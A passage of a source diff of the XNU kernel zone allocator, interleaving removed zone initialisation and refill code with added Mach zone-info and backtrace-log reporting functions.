- start_addr); - vmk_flags.vmkf_permanent = TRUE; - kr = vm_map_enter(kernel_map, &addr, size, 0, - VM_FLAGS_FIXED, vmk_flags, VM_KERN_MEMORY_ZONE, kernel_object, - 0, FALSE, VM_PROT_NONE, VM_PROT_NONE, VM_INHERIT_DEFAULT); - *submap_min = (vm_offset_t)addr; - } else { - kr = kernel_memory_allocate(kernel_map, submap_min, size, - 0, KMA_KOBJECT | KMA_PAGEABLE | KMA_VAONLY, VM_KERN_MEMORY_ZONE); - } - if (kr != KERN_SUCCESS) { - panic("zone_init_allocate_va(0x%lx:0x%zx) failed: %d", - (uintptr_t)*submap_min, (size_t)size, kr); + if (free_size >= PAGE_SIZE) { + kmem_free(ipc_kernel_map, + round_page(end_addr), free_size); + } + bzero((char *) end_addr, round_page(end_addr) - end_addr); } - r.min_address = *submap_min; - *submap_min += size; - r.max_address = *submap_min; + kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr, + (vm_map_size_t)used_size, TRUE, ©); + assert(kr == KERN_SUCCESS); - return r; + return copy; } -__startup_func -static void -zone_submap_init( - vm_offset_t *submap_min, - unsigned idx, - uint64_t zone_sub_map_numer, - uint64_t *remaining_denom, - vm_offset_t *remaining_size, - vm_size_t guard_size) +static boolean_t +get_zone_info( + zone_t z, + mach_zone_name_t *zn, + mach_zone_info_t *zi) { - vm_offset_t submap_start, submap_end; - vm_size_t submap_size; - vm_map_t submap; - kern_return_t kr; - - submap_size = trunc_page(zone_sub_map_numer * *remaining_size / - *remaining_denom); - submap_start = *submap_min; - submap_end = submap_start + submap_size; + struct zone zcopy; + vm_size_t cached = 0; -#if defined(__LP64__) - if (idx == Z_SUBMAP_IDX_VA_RESTRICTED_MAP) { - vm_offset_t restricted_va_max = zone_restricted_va_max(); - if (submap_end > restricted_va_max) { -#if DEBUG || DEVELOPMENT - printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx, - (size_t)(restricted_va_max - submap_start) >> 20, - (size_t)submap_size >> 20); -#endif /* DEBUG || DEVELOPMENT */ - guard_size += submap_end - restricted_va_max; - *remaining_size -= submap_end - restricted_va_max; - submap_end = restricted_va_max; - submap_size = restricted_va_max - submap_start; + assert(z != ZONE_NULL); + zone_lock(z); + if (!z->z_self) { + zone_unlock(z); + return FALSE; + } + zcopy = *z; + if (z->z_pcpu_cache) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + cached += zc->zc_alloc_cur + zc->zc_free_cur; + cached += zc->zc_depot_cur * zc_mag_size(); } - - vm_packing_verify_range("vm_compressor", - submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR)); - vm_packing_verify_range("vm_page", - submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR)); } -#endif /* defined(__LP64__) */ + zone_unlock(z); - vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE; - vmk_flags.vmkf_permanent = TRUE; - kr = kmem_suballoc(kernel_map, submap_min, submap_size, - FALSE, VM_FLAGS_FIXED, vmk_flags, - VM_KERN_MEMORY_ZONE, &submap); - if (kr != KERN_SUCCESS) { - panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d", - idx, (void *)submap_start, (void *)submap_end, kr); - } + if (zn != NULL) { + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + char temp_zone_name[MAX_ZONE_NAME] = ""; + snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", + zone_heap_name(z), z->z_name); -#if DEBUG || DEVELOPMENT - printf("zone_init: submap[%d] %p:%p (%zuM)\n", - idx, (void *)submap_start, (void *)submap_end, - (size_t)submap_size >> 20); -#endif /* DEBUG || DEVELOPMENT */ + /* assuming here the name data is static */ + (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name, + strlen(temp_zone_name) + 1); + } - zone_submaps[idx] = submap; - *submap_min = submap_end; - *remaining_size -= submap_size; - *remaining_denom -= zone_sub_map_numer; + if (zi != NULL) { + *zi = (mach_zone_info_t) { + .mzi_count = zone_count_allocated(&zcopy) - cached, + .mzi_cur_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_cur)), + // max_size for zprint is now high-watermark of pages used + .mzi_max_size = ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_hwm)), + .mzi_elem_size = zone_scale_for_percpu(&zcopy, zcopy.z_elem_size), + .mzi_alloc_size = ptoa_64(zcopy.z_chunk_pages), + .mzi_exhaustible = (uint64_t)zcopy.exhaustible, + }; + zpercpu_foreach(zs, zcopy.z_stats) { + zi->mzi_sum_size += zs->zs_mem_allocated; + } + if (zcopy.collectable) { + SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable, + ptoa_64(zone_scale_for_percpu(&zcopy, zcopy.z_wired_empty))); + SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE); + } + } - zone_init_allocate_va(submap_min, guard_size, true); + return TRUE; } -/* Global initialization of Zone Allocator. - * Runs after zone_bootstrap. - */ -__startup_func -static void -zone_init(void) +kern_return_t +task_zone_info( + __unused task_t task, + __unused mach_zone_name_array_t *namesp, + __unused mach_msg_type_number_t *namesCntp, + __unused task_zone_info_array_t *infop, + __unused mach_msg_type_number_t *infoCntp) { - vm_size_t zone_meta_size; - vm_size_t zone_map_size; - vm_size_t remaining_size; - vm_offset_t submap_min = 0; - - if (ZSECURITY_OPTIONS_SUBMAP_USER_DATA & zsecurity_options) { - zone_last_submap_idx = Z_SUBMAP_IDX_BAG_OF_BYTES_MAP; - } else { - zone_last_submap_idx = Z_SUBMAP_IDX_GENERAL_MAP; - } - zone_phys_mapped_max = zone_phys_size_max(); + return KERN_FAILURE; +} -#if __LP64__ - zone_map_size = ZONE_MAP_VIRTUAL_SIZE_LP64; -#else - zone_map_size = zone_phys_mapped_max; -#endif - zone_meta_size = round_page(atop(zone_map_size) * - sizeof(struct zone_page_metadata)); +kern_return_t +mach_zone_info( + host_priv_t host, + mach_zone_name_array_t *namesp, + mach_msg_type_number_t *namesCntp, + mach_zone_info_array_t *infop, + mach_msg_type_number_t *infoCntp) +{ + return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL); +} - /* - * Zone "map" setup: - * - * [ VA_RESTRICTED ] <-- LP64 only - * [ SINGLE_GUARD ] <-- LP64 only - * [ meta ] - * [ SINGLE_GUARD ] - * [ map ] \ for each extra map - * [ MULTI_GUARD ] / - */ - remaining_size = zone_map_size; -#if defined(__LP64__) - remaining_size -= SINGLE_GUARD; -#endif - remaining_size -= zone_meta_size + SINGLE_GUARD; - remaining_size -= MULTI_GUARD * (zone_last_submap_idx - - Z_SUBMAP_IDX_GENERAL_MAP + 1); -#if VM_MAX_TAG_ZONES - if (zone_tagging_on) { - zone_tagging_init(zone_map_size); - } -#endif +kern_return_t +mach_memory_info( + host_priv_t host, + mach_zone_name_array_t *namesp, + mach_msg_type_number_t *namesCntp, + mach_zone_info_array_t *infop, + mach_msg_type_number_t *infoCntp, + mach_memory_info_array_t *memoryInfop, + mach_msg_type_number_t *memoryInfoCntp) +{ + mach_zone_name_t *names; + vm_offset_t names_addr; + vm_size_t names_size; - uint64_t remaining_denom = 0; - uint64_t zone_sub_map_numer[Z_SUBMAP_IDX_COUNT] = { -#ifdef __LP64__ - [Z_SUBMAP_IDX_VA_RESTRICTED_MAP] = 20, -#endif /* defined(__LP64__) */ - [Z_SUBMAP_IDX_GENERAL_MAP] = 40, - [Z_SUBMAP_IDX_BAG_OF_BYTES_MAP] = 40, - }; + mach_zone_info_t *info; + vm_offset_t info_addr; + vm_size_t info_size; - for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) { -#if DEBUG || DEVELOPMENT - char submap_name[MAX_SUBMAP_NAME]; - snprintf(submap_name, MAX_SUBMAP_NAME, "submap%d", idx); - PE_parse_boot_argn(submap_name, &zone_sub_map_numer[idx], sizeof(uint64_t)); -#endif - remaining_denom += zone_sub_map_numer[idx]; - } + mach_memory_info_t *memory_info; + vm_offset_t memory_info_addr; + vm_size_t memory_info_size; + vm_size_t memory_info_vmsize; + unsigned int num_info; - /* - * And now allocate the various pieces of VA and submaps. - * - * Make a first allocation of contiguous VA, that we'll deallocate, - * and we'll carve-out memory in that range again linearly. - * The kernel is stil single threaded at this stage. - */ + unsigned int max_zones, used_zones, i; + mach_zone_name_t *zn; + mach_zone_info_t *zi; + kern_return_t kr; - struct zone_map_range *map_range = &zone_info.zi_map_range; + uint64_t zones_collectable_bytes = 0; - *map_range = zone_init_allocate_va(&submap_min, zone_map_size, false); - submap_min = map_range->min_address; - kmem_free(kernel_map, submap_min, zone_map_size); + if (host == HOST_NULL) { + return KERN_INVALID_HOST; + } +#if CONFIG_DEBUGGER_FOR_ZONE_INFO + if (!PE_i_can_has_debugger(NULL)) { + return KERN_INVALID_HOST; + } +#endif -#if defined(__LP64__) /* - * Allocate `Z_SUBMAP_IDX_VA_RESTRICTED_MAP` first because its VA range - * can't go beyond RESTRICTED_VA_MAX for the vm_page_t packing to work. + * We assume that zones aren't freed once allocated. + * We won't pick up any zones that are allocated later. */ - zone_submap_init(&submap_min, Z_SUBMAP_IDX_VA_RESTRICTED_MAP, - zone_sub_map_numer[Z_SUBMAP_IDX_VA_RESTRICTED_MAP], &remaining_denom, - &remaining_size, SINGLE_GUARD); -#endif /* defined(__LP64__) */ - /* - * Allocate metadata array - */ - zone_info.zi_meta_range = - zone_init_allocate_va(&submap_min, zone_meta_size, true); - zone_init_allocate_va(&submap_min, SINGLE_GUARD, true); + max_zones = os_atomic_load(&num_zones, relaxed); - zone_info.zi_array_base = - (struct zone_page_metadata *)zone_info.zi_meta_range.min_address - - zone_pva_from_addr(map_range->min_address).packed_address; + names_size = round_page(max_zones * sizeof *names); + kr = kmem_alloc_pageable(ipc_kernel_map, + &names_addr, names_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; + } + names = (mach_zone_name_t *) names_addr; - /* - * Allocate other submaps - */ - for (unsigned idx = Z_SUBMAP_IDX_GENERAL_MAP; idx <= zone_last_submap_idx; idx++) { - zone_submap_init(&submap_min, idx, zone_sub_map_numer[idx], - &remaining_denom, &remaining_size, MULTI_GUARD); + info_size = round_page(max_zones * sizeof *info); + kr = kmem_alloc_pageable(ipc_kernel_map, + &info_addr, info_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + kmem_free(ipc_kernel_map, + names_addr, names_size); + return kr; } + info = (mach_zone_info_t *) info_addr; - vm_map_t general_map = zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP]; - zone_info.zi_general_range.min_address = vm_map_min(general_map); - zone_info.zi_general_range.max_address = vm_map_max(general_map); + zn = &names[0]; + zi = &info[0]; - assert(submap_min == map_range->max_address); + used_zones = max_zones; + for (i = 0; i < max_zones; i++) { + if (!get_zone_info(&(zone_array[i]), zn, zi)) { + used_zones--; + continue; + } + zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable); + zn++; + zi++; + } -#if CONFIG_GZALLOC - gzalloc_init(zone_map_size); -#endif + *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names); + *namesCntp = used_zones; - zone_create_flags_t kma_flags = ZC_NOCACHING | - ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT | - ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE; + *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info); + *infoCntp = used_zones; - (void)zone_create_ext("vm.permanent", 1, kma_flags, - ZONE_ID_PERMANENT, ^(zone_t z){ - z->permanent = true; - z->z_elem_size = 1; - z->pcpu_elem_size = 1; -#if defined(__LP64__) - z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP; -#endif - }); - (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU, - ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){ - z->permanent = true; - z->z_elem_size = 1; - z->pcpu_elem_size = zpercpu_count(); -#if defined(__LP64__) - z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP; -#endif - }); + num_info = 0; + memory_info_addr = 0; - /* - * Now fix the zones that are missing their zone stats - * we don't really know if zfree()s happened so our stats - * are slightly off for early boot. ¯\_(ツ)_/¯ - */ - zone_index_foreach(idx) { - zone_t tz = &zone_array[idx]; + if (memoryInfop && memoryInfoCntp) { + vm_map_copy_t copy; + num_info = vm_page_diagnose_estimate(); + memory_info_size = num_info * sizeof(*memory_info); + memory_info_vmsize = round_page(memory_info_size); + kr = kmem_alloc_pageable(ipc_kernel_map, + &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; + } - if (tz->z_self) { - zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats); + kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, + VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); + assert(kr == KERN_SUCCESS); - zpercpu_get_cpu(zs, 0)->zs_mem_allocated += - (tz->countavail - tz->countfree) * - zone_elem_size(tz); - assert(tz->z_stats == NULL); - tz->z_stats = zs; -#if ZONE_ENABLE_LOGGING - if (tz->zone_logging && !tz->zlog_btlog) { - zone_enable_logging(tz); - } -#endif - } - } + memory_info = (mach_memory_info_t *) memory_info_addr; + vm_page_diagnose(memory_info, num_info, zones_collectable_bytes); -#if CONFIG_ZLEAKS - /* - * Initialize the zone leak monitor - */ - zleak_init(zone_map_size); -#endif /* CONFIG_ZLEAKS */ + kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE); + assert(kr == KERN_SUCCESS); -#if VM_MAX_TAG_ZONES - if (zone_tagging_on) { - vm_allocation_zones_init(); - } -#endif -} -STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init); + kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr, + (vm_map_size_t)memory_info_size, TRUE, ©); + assert(kr == KERN_SUCCESS); -__startup_func -static void -zone_set_foreign_range( - vm_offset_t range_min, - vm_offset_t range_max) -{ - zone_info.zi_foreign_range.min_address = range_min; - zone_info.zi_foreign_range.max_address = range_max; -} + *memoryInfop = (mach_memory_info_t *) copy; + *memoryInfoCntp = num_info; + } -__startup_func -vm_offset_t -zone_foreign_mem_init(vm_size_t size) -{ - vm_offset_t mem = (vm_offset_t) pmap_steal_memory(size); - zone_set_foreign_range(mem, mem + size); - return mem; + return KERN_SUCCESS; } -#pragma mark zalloc - -#if KASAN_ZALLOC -/* - * Called from zfree() to add the element being freed to the KASan quarantine. - * - * Returns true if the newly-freed element made it into the quarantine without - * displacing another, false otherwise. In the latter case, addrp points to the - * address of the displaced element, which will be freed by the zone. - */ -static bool -kasan_quarantine_freed_element( - zone_t *zonep, /* the zone the element is being freed to */ - void **addrp) /* address of the element being freed */ +kern_return_t +mach_zone_info_for_zone( + host_priv_t host, + mach_zone_name_t name, + mach_zone_info_t *infop) { - zone_t zone = *zonep; - void *addr = *addrp; - - /* - * Resize back to the real allocation size and hand off to the KASan - * quarantine. `addr` may then point to a different allocation, if the - * current element replaced another in the quarantine. The zone then - * takes ownership of the swapped out free element. - */ - vm_size_t usersz = zone_elem_size(zone) - 2 * zone->kasan_redzone; - vm_size_t sz = usersz; + zone_t zone_ptr; - if (addr && zone->kasan_redzone) { - kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC); - addr = (void *)kasan_dealloc((vm_address_t)addr, &sz); - assert(sz == zone_elem_size(zone)); - } - if (addr && !zone->kasan_noquarantine) { - kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true); - if (!addr) { - return TRUE; - } + if (host == HOST_NULL) { + return KERN_INVALID_HOST; } - if (addr && zone->kasan_noquarantine) { - kasan_unpoison(addr, zone_elem_size(zone)); +#if CONFIG_DEBUGGER_FOR_ZONE_INFO + if (!PE_i_can_has_debugger(NULL)) { + return KERN_INVALID_HOST; } - *addrp = addr; - return FALSE; -} - -#endif /* KASAN_ZALLOC */ +#endif -static inline bool -zone_needs_async_refill(zone_t zone) -{ - if (zone->countfree != 0 || zone->async_pending || zone->no_callout) { - return false; + if (infop == NULL) { + return KERN_INVALID_ARGUMENT; } - return zone->expandable || zone->page_count < zone->page_count_max; -} - -__attribute__((noinline)) -static void -zone_refill_synchronously_locked( - zone_t zone, - zalloc_flags_t flags) -{ - thread_t thr = current_thread(); - bool set_expanding_vm_priv = false; - zone_pva_t orig = zone->pages_intermediate; - - while ((flags & Z_NOWAIT) == 0 && (zone->permanent - ? zone_pva_is_equal(zone->pages_intermediate, orig) - : zone->countfree == 0)) { + zone_ptr = ZONE_NULL; + zone_foreach(z) { /* - * zone is empty, try to expand it - * - * Note that we now allow up to 2 threads (1 vm_privliged and - * 1 non-vm_privliged) to expand the zone concurrently... - * - * this is necessary to avoid stalling vm_privileged threads - * running critical code necessary to continue - * compressing/swapping pages (i.e. making new free pages) from - * stalling behind non-vm_privileged threads waiting to acquire - * free pages when the vm_page_free_count is below the - * vm_page_free_reserved limit. + * Append kalloc heap name to zone name (if zone is used by kalloc) */ - if ((zone->expanding_no_vm_priv || zone->expanding_vm_priv) && - (((thr->options & TH_OPT_VMPRIV) == 0) || zone->expanding_vm_priv)) { - /* - * This is a non-vm_privileged thread and a non-vm_privileged or - * a vm_privileged thread is already expanding the zone... - * OR - * this is a vm_privileged thread and a vm_privileged thread is - * already expanding the zone... - * - * In either case wait for a thread to finish, then try again. - */ - zone->waiting = true; - assert_wait(zone, THREAD_UNINT); - unlock_zone(zone); - thread_block(THREAD_CONTINUE_NULL); - lock_zone(zone); - continue; - } - - if (zone->page_count >= zone->page_count_max) { - if (zone->exhaustible) { - break; - } - if (zone->expandable) { - /* - * If we're expandable, just don't go through this again. - */ - zone->page_count_max = ~0u; - } else { - unlock_zone(zone); + char temp_zone_name[MAX_ZONE_NAME] = ""; + snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", + zone_heap_name(z), z->z_name); - panic_include_zprint = true; -#if CONFIG_ZLEAKS - if (zleak_state & ZLEAK_STATE_ACTIVE) { - panic_include_ztrace = true; - } -#endif /* CONFIG_ZLEAKS */ - panic("zalloc: zone \"%s\" empty.", zone->z_name); - } + /* Find the requested zone by name */ + if (track_this_zone(temp_zone_name, name.mzn_name)) { + zone_ptr = z; + break; } + } - /* - * It is possible that a BG thread is refilling/expanding the zone - * and gets pre-empted during that operation. That blocks all other - * threads from making progress leading to a watchdog timeout. To - * avoid that, boost the thread priority using the rwlock boost - */ - set_thread_rwlock_boost(); + /* No zones found with the requested zone name */ + if (zone_ptr == ZONE_NULL) { + return KERN_INVALID_ARGUMENT; + } - if ((thr->options & TH_OPT_VMPRIV)) { - zone->expanding_vm_priv = true; - set_expanding_vm_priv = true; - } else { - zone->expanding_no_vm_priv = true; - } + if (get_zone_info(zone_ptr, NULL, infop)) { + return KERN_SUCCESS; + } + return KERN_FAILURE; +} - zone_replenish_locked(zone, flags, false); +kern_return_t +mach_zone_info_for_largest_zone( + host_priv_t host, + mach_zone_name_t *namep, + mach_zone_info_t *infop) +{ + if (host == HOST_NULL) { + return KERN_INVALID_HOST; + } +#if CONFIG_DEBUGGER_FOR_ZONE_INFO + if (!PE_i_can_has_debugger(NULL)) { + return KERN_INVALID_HOST; + } +#endif - if (set_expanding_vm_priv == true) { - zone->expanding_vm_priv = false; - } else { - zone->expanding_no_vm_priv = false; - } + if (namep == NULL || infop == NULL) { + return KERN_INVALID_ARGUMENT; + } - if (zone->waiting) { - zone->waiting = false; - thread_wakeup(zone); - } - clear_thread_rwlock_boost(); + if (get_zone_info(zone_find_largest(), namep, infop)) { + return KERN_SUCCESS; + } + return KERN_FAILURE; +} + +uint64_t +get_zones_collectable_bytes(void) +{ + uint64_t zones_collectable_bytes = 0; + mach_zone_info_t zi; - if (zone->countfree == 0) { - assert(flags & Z_NOPAGEWAIT); - break; + zone_foreach(z) { + if (get_zone_info(z, NULL, &zi)) { + zones_collectable_bytes += + GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable); } } - if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) && - zone_needs_async_refill(zone) && !vm_pool_low()) { - zone->async_pending = true; - unlock_zone(zone); - thread_call_enter(&call_async_alloc); - lock_zone(zone); - assert(zone->z_self == zone); - } + return zones_collectable_bytes; } -__attribute__((noinline)) -static void -zone_refill_asynchronously_locked(zone_t zone) +kern_return_t +mach_zone_get_zlog_zones( + host_priv_t host, + mach_zone_name_array_t *namesp, + mach_msg_type_number_t *namesCntp) { - uint32_t min_free = zone->prio_refill_count / 2; - uint32_t resv_free = zone->prio_refill_count / 4; - thread_t thr = current_thread(); +#if ZONE_ENABLE_LOGGING + unsigned int max_zones, logged_zones, i; + kern_return_t kr; + zone_t zone_ptr; + mach_zone_name_t *names; + vm_offset_t names_addr; + vm_size_t names_size; - /* - * Nothing to do if there are plenty of elements. - */ - while (zone->countfree <= min_free) { - /* - * Wakeup the replenish thread if not running. - */ - if (!zone->zone_replenishing) { - lck_spin_lock(&zone_replenish_lock); - assert(zone_replenish_active < zone_replenish_max_threads); - ++zone_replenish_active; - lck_spin_unlock(&zone_replenish_lock); - zone->zone_replenishing = true; - zone_replenish_wakeups_initiated++; - thread_wakeup(&zone->prio_refill_count); - } + if (host == HOST_NULL) { + return KERN_INVALID_HOST; + } - /* - * We'll let VM_PRIV threads to continue to allocate until the - * reserve drops to 25%. After that only TH_OPT_ZONE_PRIV threads - * may continue. - * - * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish thread itself. - * Replenish threads *need* to use the reserve. GC threads need to - * get through the current allocation, but then will wait at a higher - * level after they've dropped any locks which would deadlock the - * replenish thread. - */ - if ((zone->countfree > resv_free && (thr->options & TH_OPT_VMPRIV)) || - (thr->options & TH_OPT_ZONE_PRIV)) { - break; - } + if (namesp == NULL || namesCntp == NULL) { + return KERN_INVALID_ARGUMENT; + } - /* - * Wait for the replenish threads to add more elements for us to allocate from. - */ - zone_replenish_throttle_count++; - unlock_zone(zone); - assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC); - thread_block(THREAD_CONTINUE_NULL); - lock_zone(zone); + max_zones = os_atomic_load(&num_zones, relaxed); - assert(zone->z_self == zone); + names_size = round_page(max_zones * sizeof *names); + kr = kmem_alloc_pageable(ipc_kernel_map, + &names_addr, names_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; } + names = (mach_zone_name_t *) names_addr; - /* - * If we're here because of zone_gc(), we didn't wait for - * zone_replenish_thread to finish. So we need to ensure that - * we will successfully grab an element. - * - * zones that have a replenish thread configured. - * The value of (refill_level / 2) in the previous bit of code should have - * given us headroom even though this thread didn't wait. - */ - if (thr->options & TH_OPT_ZONE_PRIV) { - assert(zone->countfree != 0); + zone_ptr = ZONE_NULL; + logged_zones = 0; + for (i = 0; i < max_zones; i++) { + zone_t z = &(zone_array[i]); + assert(z != ZONE_NULL); + + /* Copy out the zone name if zone logging is enabled */ + if (z->zlog_btlog) { + get_zone_info(z, &names[logged_zones], NULL); + logged_zones++; + } } + + *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names); + *namesCntp = logged_zones; + + return KERN_SUCCESS; + +#else /* ZONE_ENABLE_LOGGING */ +#pragma unused(host, namesp, namesCntp) + return KERN_FAILURE; +#endif /* ZONE_ENABLE_LOGGING */ } -#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS -__attribute__((noinline)) -static void -zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr) +kern_return_t +mach_zone_get_btlog_records( + host_priv_t host, + mach_zone_name_t name, + zone_btrecord_array_t *recsp, + mach_msg_type_number_t *recsCntp) { - uintptr_t zbt[MAX_ZTRACE_DEPTH]; /* used in zone leak logging and zone leak detection */ - unsigned int numsaved = 0; +#if DEBUG || DEVELOPMENT + unsigned int numrecs = 0; + zone_btrecord_t *recs; + kern_return_t kr; + zone_t zone_ptr; + vm_offset_t recs_addr; + vm_size_t recs_size; -#if ZONE_ENABLE_LOGGING - if (DO_LOGGING(zone)) { - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(0), NULL); - btlog_add_entry(zone->zlog_btlog, (void *)addr, - ZOP_ALLOC, (void **)zbt, numsaved); + if (host == HOST_NULL) { + return KERN_INVALID_HOST; } -#endif -#if CONFIG_ZLEAKS - /* - * Zone leak detection: capture a backtrace every zleak_sample_factor - * allocations in this zone. - */ - if (__improbable(zone->zleak_on)) { - if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) { - /* Avoid backtracing twice if zone logging is on */ - if (numsaved == 0) { - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(1), NULL); - } - /* Sampling can fail if another sample is happening at the same time in a different zone. */ - if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) { - /* If it failed, roll back the counter so we sample the next allocation instead. */ - zone->zleak_capture = zleak_sample_factor; - } - } + if (recsp == NULL || recsCntp == NULL) { + return KERN_INVALID_ARGUMENT; } - if (__improbable(zone_leaks_scan_enable && - !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) { - unsigned int count, idx; - /* Fill element, from tail, with backtrace in reverse order */ - if (numsaved == 0) { - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(1), NULL); - } - count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t)); - if (count >= numsaved) { - count = numsaved - 1; - } - for (idx = 0; idx < count; idx++) { - ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1]; + zone_ptr = ZONE_NULL; + zone_foreach(z) { + /* + * Append kalloc heap name to zone name (if zone is used by kalloc) + */ + char temp_zone_name[MAX_ZONE_NAME] = ""; + snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", + zone_heap_name(z), z->z_name); + + /* Find the requested zone by name */ + if (track_this_zone(temp_zone_name, name.mzn_name)) { + zone_ptr = z; + break; } } -#endif /* CONFIG_ZLEAKS */ -} -static inline bool -zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size) -{ -#if ZONE_ENABLE_LOGGING - if (DO_LOGGING(zone)) { - return true; + /* No zones found with the requested zone name */ + if (zone_ptr == ZONE_NULL) { + return KERN_INVALID_ARGUMENT; } -#endif -#if CONFIG_ZLEAKS - /* - * Zone leak detection: capture a backtrace every zleak_sample_factor - * allocations in this zone. - */ - if (zone->zleak_on) { - return true; + + /* Logging not turned on for the requested zone */ + if (!DO_LOGGING(zone_ptr)) { + return KERN_FAILURE; } - if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) { - return true; + + /* Allocate memory for btlog records */ + numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog)); + recs_size = round_page(numrecs * sizeof *recs); + + kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC); + if (kr != KERN_SUCCESS) { + return kr; } -#endif /* CONFIG_ZLEAKS */ - return false; -} -#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */ -#if ZONE_ENABLE_LOGGING -__attribute__((noinline)) -static void -zfree_log_trace(zone_t zone, vm_offset_t addr) -{ /* - * See if we're doing logging on this zone. - * - * There are two styles of logging used depending on - * whether we're trying to catch a leak or corruption. + * We will call get_btlog_records() below which populates this region while holding a spinlock + * (the btlog lock). So these pages need to be wired. */ - if (__improbable(DO_LOGGING(zone))) { - if (corruption_debug_flag) { - uintptr_t zbt[MAX_ZTRACE_DEPTH]; - unsigned int numsaved; - /* - * We're logging to catch a corruption. - * - * Add a record of this zfree operation to log. - */ - numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH, - __builtin_frame_address(1), NULL); - btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE, - (void **)zbt, numsaved); - } else { - /* - * We're logging to catch a leak. - * - * Remove any record we might have for this element - * since it's being freed. Note that we may not find it - * if the buffer overflowed and that's OK. - * - * Since the log is of a limited size, old records get - * overwritten if there are more zallocs than zfrees. - */ - btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr); - } - } -} -#endif /* ZONE_ENABLE_LOGGING */ + kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size, + VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE); + assert(kr == KERN_SUCCESS); -/* - * Removes an element from the zone's free list, returning 0 if the free list is empty. - * Verifies that the next-pointer and backup next-pointer are intact, - * and verifies that a poisoned element hasn't been modified. - */ -vm_offset_t -zalloc_direct_locked( - zone_t zone, - zalloc_flags_t flags __unused, - vm_size_t waste __unused) -{ - struct zone_page_metadata *page_meta; - zone_addr_kind_t kind = ZONE_ADDR_NATIVE; - vm_offset_t element, page, validate_bit = 0; - - /* if zone is empty, bail */ - if (!zone_pva_is_null(zone->pages_any_free_foreign)) { - kind = ZONE_ADDR_FOREIGN; - page_meta = zone_pva_to_meta(zone->pages_any_free_foreign, kind); - page = (vm_offset_t)page_meta; - } else if (!zone_pva_is_null(zone->pages_intermediate)) { - page_meta = zone_pva_to_meta(zone->pages_intermediate, kind); - page = zone_pva_to_addr(zone->pages_intermediate); - } else if (!zone_pva_is_null(zone->pages_all_free)) { - page_meta = zone_pva_to_meta(zone->pages_all_free, kind); - page = zone_pva_to_addr(zone->pages_all_free); - if (os_sub_overflow(zone->allfree_page_count, - 